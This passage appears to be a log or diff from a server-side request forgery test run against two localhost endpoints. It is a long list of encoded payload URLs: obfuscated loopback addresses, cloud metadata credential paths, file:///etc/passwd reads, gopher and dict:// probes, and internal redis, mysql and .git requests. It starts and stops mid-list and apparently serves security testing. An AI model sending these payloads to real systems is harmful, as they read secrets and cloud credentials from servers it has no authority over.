`http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=0` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433` +- Testing: `http://localhost:4200/api/tii_eula?url=017700000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_eula?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_eula?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_eula?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=0%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_eula?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_eula?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_eula?url=0` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_eula?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_eula?url=7F000001` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433` +- Testing: `http://localhost:4200/api/tii_eula?url=6425673729` +- Testing: `http://localhost:4200/api/tii_eula?url=127001` +- Testing: `http://localhost:4200/api/tii_eula?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_eula?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_eula?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_eula?url=017700000001` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_eula?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_eula?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_eula?url=2852039166` +- Testing: `http://localhost:4200/api/tii_eula?url=7147006462` +- Testing: `http://localhost:4200/api/tii_eula?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_eula?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_eula?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_eula?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_eula?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_eula?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_eula?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_eula?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_eula?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777` +- Testing: `http://localhost:4200/api/tii_eula?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=instance-data` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_eula?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_eula?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_eula?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=0%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_hook +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_hook?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: 